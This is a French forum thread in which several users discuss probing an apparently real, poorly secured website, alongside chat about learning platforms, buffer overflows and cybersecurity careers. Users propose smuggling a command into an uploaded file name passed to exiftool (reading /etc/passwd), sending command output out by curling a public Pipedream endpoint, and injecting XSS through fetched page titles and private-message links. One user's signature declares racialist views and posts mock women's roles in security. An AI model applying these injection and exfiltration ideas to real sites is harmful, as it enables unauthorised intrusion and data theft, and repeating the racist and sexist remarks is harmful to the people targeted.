InscriptionConnexion
miko
miko
4 mois
Le truc c'est que si tu fais la même chose avec l'IP du site ça donne cloudflare en server et non Apache :

HTTP/1.1 403 Forbidden
Date Fri, 25 Apr 2025 18: 30:55 GMT
Content-Type text/plain; charset=UTF-8
Content-Length 16
Connection close
X-Frame-Options SAMEORIGIN
Referrer-Policy same-origin
Cache-Control private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires Thu, 01 Jan 1970 00:00:01 GMT
Server cloudflare
CF-RAY
CloudFlare c'est l'hébergeur et donc il masque le header de serveur de ses clients quand vous les contacté via leur ip publique.

Il agit comme un proxy
il y a 4 mois
__Lain__
__Lain__
4 mois
ah mdr

t'a testé de mettre un payload RCE dans le nom du fichier ? vue qu'il lance la commande exiftool dessus.

c'est quoi cette passoire de fou que vous avez chopper
:zahi:
Tu voudrais dire du style nomdufichier.png; cat /etc/passwd

par exemple ?
:miaou:

il y a 4 mois
Me0w
Me0w
4 mois
Attends tu as eu une réponse HTTP 200 (Ok) ???

Sur quelle ressource ? J'ai que des 404 sur son localhost.
localhost et 127.0.0.1 me donne tous des HTTP 200 sur l'output de la page du site
:miko_think:
il y a 4 mois
oui
il y a 4 mois
Me0w
Me0w
4 mois
Tu voudrais dire du style nomdufichier.png; cat /etc/passwd

par exemple ?
ui
il y a 4 mois
non utilise une pipdream ou un dns temporaire publique que tu curl
il y a 4 mois
pipdream c'est juste un api publique crée en deux minute que tu peu appeller.

Genre si tu curl monlienpipdream2f852s8 https://monlienpipdream2f[...]_resultat_de_la_commande}

tu verra le res de la commande dans les logs de ton pipdream

et t'a bypass le faite que tu ais pas l'ouput
il y a 4 mois
__Lain__
__Lain__
4 mois
pipdream c'est juste un api publique crée en deux minute que tu peu appeller.

Genre si tu curl monlienpipdream2f852s8 https://monlienpipdream2f[...]_resultat_de_la_commande}

tu verra le res de la commande dans les logs de ton pipdream

et t'a bypass le faite que tu ais pas l'ouput
c'est aussi utile pour les xss
il y a 4 mois
miko
miko
5 mois
Tu es très bien payé en cybersécurité si c'est ce que tu veux savoir et ce n'est pas bouché
:miko_think:
:goslingrire:
il y a 4 mois
des gens qui sont sur root-me ?

je suis moins fan de thm perso
il y a 4 mois
Me0w
Me0w
4 mois
Il n'est jamais trop tard
:chat_gentil:
J'ai 31 ans, j'ai déjà fait deux reconversions. C'est fini.

Je vais peut-être devenir PROGRESSIVEMENT meilleur en cybersécurité, car en lien avec mon job principal (après tout hier j'ai pété un windows), mais je n'atteindrais pas un niveau digne d'un bac+5.

Je le sais, car j'ai FAIS mon stage dans une boite qui fait de la cyber.
L'écart de niveau, de technique mais surtout de SAVOIR DE BASE est abyssale.

Par exemple, on m'a parlé d'attaque par empilement, de flippe, spoofing, etc

Je ne pigeais pratiquement RIEN. Je connais des méthodes classiques et simples comme le bruteforce et le phising, mais ça s'arrête là. Sans parler du reste : docker, architecture de programme, CI CD

J'étais en PLS astrale. Je suis heureux qu'on m'aie donné une chance. Mais bordel là je me suis rendu compte que la Cyber c'était pas possible.
Je ne suis pas patriote ou nationaliste. Je ne l'ai jamais été. Juste racialiste et anti européen. démocratie = scam.
il y a 4 mois
__Lain__
__Lain__
4 mois
des gens qui sont sur root-me ?

je suis moins fan de thm perso
Pas encore, je commence via thm pour apprendre bien toutes les bases et ensuite je compte passer sur hackthebox et root-me
:miko_think:


Je viens de penser à un truc pour la XSS par contre, le site récupère le titre des pages que tu lui donne et les outputs sur la page, ça veut dire avec ton propre serveur tu crée juste une page qui a comme titre un payload XSS et ça devrait le faire
:miko_think:
il y a 4 mois
miko
miko
4 mois
Pas encore, je commence via thm pour apprendre bien toutes les bases et ensuite je compte passer sur hackthebox et root-me
:miko_think:


Je viens de penser à un truc pour la XSS par contre, le site récupère le titre des pages que tu lui donne et les outputs sur la page, ça veut dire avec ton propre serveur tu crée juste une page qui a comme titre un payload XSS et ça devrait le faire
:miko_think:
oui si c'est pas filtré ça peu le faire

vue que le truc à l'air sacrement bancal
il y a 4 mois
Elchapka2
Elchapka2
4 mois
J'ai 31 ans, j'ai déjà fait deux reconversions. C'est fini.

Je vais peut-être devenir PROGRESSIVEMENT meilleur en cybersécurité, car en lien avec mon job principal (après tout hier j'ai pété un windows), mais je n'atteindrais pas un niveau digne d'un bac+5.

Je le sais, car j'ai FAIS mon stage dans une boite qui fait de la cyber.
L'écart de niveau, de technique mais surtout de SAVOIR DE BASE est abyssale.

Par exemple, on m'a parlé d'attaque par empilement, de flippe, spoofing, etc

Je ne pigeais pratiquement RIEN. Je connais des méthodes classiques et simples comme le bruteforce et le phising, mais ça s'arrête là. Sans parler du reste : docker, architecture de programme, CI CD

J'étais en PLS astrale. Je suis heureux qu'on m'aie donné une chance. Mais bordel là je me suis rendu compte que la Cyber c'était pas possible.
Après là tu parle pour des jobs de pentest

mais si tu part en SOC analyste t'aura pas à comprendre des trucs aussi avancé.

attaque par empilement tu parle des buffer overflow ?
il y a 4 mois
miko
miko
4 mois
Pas encore, je commence via thm pour apprendre bien toutes les bases et ensuite je compte passer sur hackthebox et root-me
:miko_think:


Je viens de penser à un truc pour la XSS par contre, le site récupère le titre des pages que tu lui donne et les outputs sur la page, ça veut dire avec ton propre serveur tu crée juste une page qui a comme titre un payload XSS et ça devrait le faire
:miko_think:
root me c'est vraiment incr je trouve parce que t'a vraiment besoin d'avoir compris le truc à 100% pour flag

le seul problème c'est que parfois la difficulté est juste absurde. Genre c'est des trucs qui existe pas irl. Je me souviens d'une LFI ou fallait trouver un fichier sauf que le nom du dossier ou il est habituellement avait était précédé d'un .
genre .toto/flag.txt

et donc tu le voyais pas
:Lainbrise:
il y a 4 mois
__Lain__
__Lain__
4 mois
root me c'est vraiment incr je trouve parce que t'a vraiment besoin d'avoir compris le truc à 100% pour flag

le seul problème c'est que parfois la difficulté est juste absurde. Genre c'est des trucs qui existe pas irl. Je me souviens d'une LFI ou fallait trouver un fichier sauf que le nom du dossier ou il est habituellement avait était précédé d'un .
genre .toto/flag.txt

et donc tu le voyais pas
:Lainbrise:
Tu as aussi un peu ça sur thm quand tu fais les challenges, j'essaye de suivre les "cours" qu'ils te donnent et ensuite je vais faire des challenges pour m’entraîner sur ce que je viens d'apprendre
:miko_think:


J'avais fais un peu de root-me il y a quelques mois mais pas grand choses, juste du web basique mais je compte y retourner dès que je serais meilleur
:miko_bong:
il y a 4 mois
J'ai demandé à un ami qui à un vps et un serveur http pour test, je verrais quand il me répond
:miko_think:


Check les MP quand tu mets un lien de village ça fait n'importe quoi, tu peux exploiter la XSS comme ça aussi à mon avis
:miko_think:
il y a 4 mois
__Lain__
__Lain__
4 mois
Après là tu parle pour des jobs de pentest

mais si tu part en SOC analyste t'aura pas à comprendre des trucs aussi avancé.

attaque par empilement tu parle des buffer overflow ?
"attaque par empilement tu parle des buffer overflow ?"


C'était une façon dont les données étaient gérées à l'époque, ça faisait une pile. Et si on rajoutais trop de données dans cette pile il se passait un truc. Il suffisait d'ajouter les données qu'on voulait pour surcharger la pile et de laisser dépiler la pile, et en gros c'était ton méchant code qui était retenu.

Je ne comprends pas même le concept de pilé-dépilé. Je crois que c'est en lien avec du C

Il y avait des postes plus "chill" comme l'IAM (identity and acces management) qui demande surtout de savoir lire des logs, gérer des trucs d'accès (ça, à la limite - ce serait envisageable pour moi), sauf que c'est pas vraiment ça qui recrute (c'est facile - et beaucoup savent faire)

Il y avait aussi un type de job qui était plutôt réservé aux gonzesses. C'était faire de la "sensibilisation" au personnel, de ne pas cliquer sur les liens, attentions aux clef usb qui trainent
:zahi:

Si t'es pas une meuf oublie, c'est là qu'on les case pour qu'elles fassent leur powerpoint 3.0 sur le "Quishing"
:zahi:

- un enfant de 16 ans qui a eu un pc fixe né dans les années 90 à de base ce niveau sans étudier et serait capable de faire ce job.

Et ensuite, il y avait les VRAIS JOBS. Ceux où on fait pas semblant. Pas de bullshit powerpoint. Du dur : pentesting & co
Je ne suis pas patriote ou nationaliste. Je ne l'ai jamais été. Juste racialiste et anti européen. démocratie = scam.
il y a 4 mois
__Lain__
__Lain__
4 mois
root me c'est vraiment incr je trouve parce que t'a vraiment besoin d'avoir compris le truc à 100% pour flag

le seul problème c'est que parfois la difficulté est juste absurde. Genre c'est des trucs qui existe pas irl. Je me souviens d'une LFI ou fallait trouver un fichier sauf que le nom du dossier ou il est habituellement avait était précédé d'un .
genre .toto/flag.txt

et donc tu le voyais pas
:Lainbrise:
C'est dans mes pratiques d'informaticien de faire des regex "large", pour ne pas laisser passer ce genre de détails.

Insensible aux majuscules, insensible à ce qu'il y a avant après, souple sur les -_+*/ et autre
Je ne suis pas patriote ou nationaliste. Je ne l'ai jamais été. Juste racialiste et anti européen. démocratie = scam.
il y a 4 mois
Elchapka2
Elchapka2
4 mois
"attaque par empilement tu parle des buffer overflow ?"


C'était une façon dont les données étaient gérées à l'époque, ça faisait une pile. Et si on rajoutais trop de données dans cette pile il se passait un truc. Il suffisait d'ajouter les données qu'on voulait pour surcharger la pile et de laisser dépiler la pile, et en gros c'était ton méchant code qui était retenu.

Je ne comprends pas même le concept de pilé-dépilé. Je crois que c'est en lien avec du C

Il y avait des postes plus "chill" comme l'IAM (identity and acces management) qui demande surtout de savoir lire des logs, gérer des trucs d'accès (ça, à la limite - ce serait envisageable pour moi), sauf que c'est pas vraiment ça qui recrute (c'est facile - et beaucoup savent faire)

Il y avait aussi un type de job qui était plutôt réservé aux gonzesses. C'était faire de la "sensibilisation" au personnel, de ne pas cliquer sur les liens, attentions aux clef usb qui trainent
:zahi:

Si t'es pas une meuf oublie, c'est là qu'on les case pour qu'elles fassent leur powerpoint 3.0 sur le "Quishing"
:zahi:

- un enfant de 16 ans qui a eu un pc fixe né dans les années 90 à de base ce niveau sans étudier et serait capable de faire ce job.

Et ensuite, il y avait les VRAIS JOBS. Ceux où on fait pas semblant. Pas de bullshit powerpoint. Du dur : pentesting & co
oui donc c'est bien ça

Quand la pile est dépassé à cause d'une entré mal géré trop grande. Tu peu écrire tes propre instruction dans la mémoire.

pilé-dépilé c'est juste une structure de données.

tu empile A puis B puis C par exemple :

C
B
A

et donc le premier élément de ta pile c'est C et c'est le seul auquel tu peu accéder


et oue pour les jobs c'est à peu prêt ça. Après t'a tout le coté légal et doc aussi
il y a 4 mois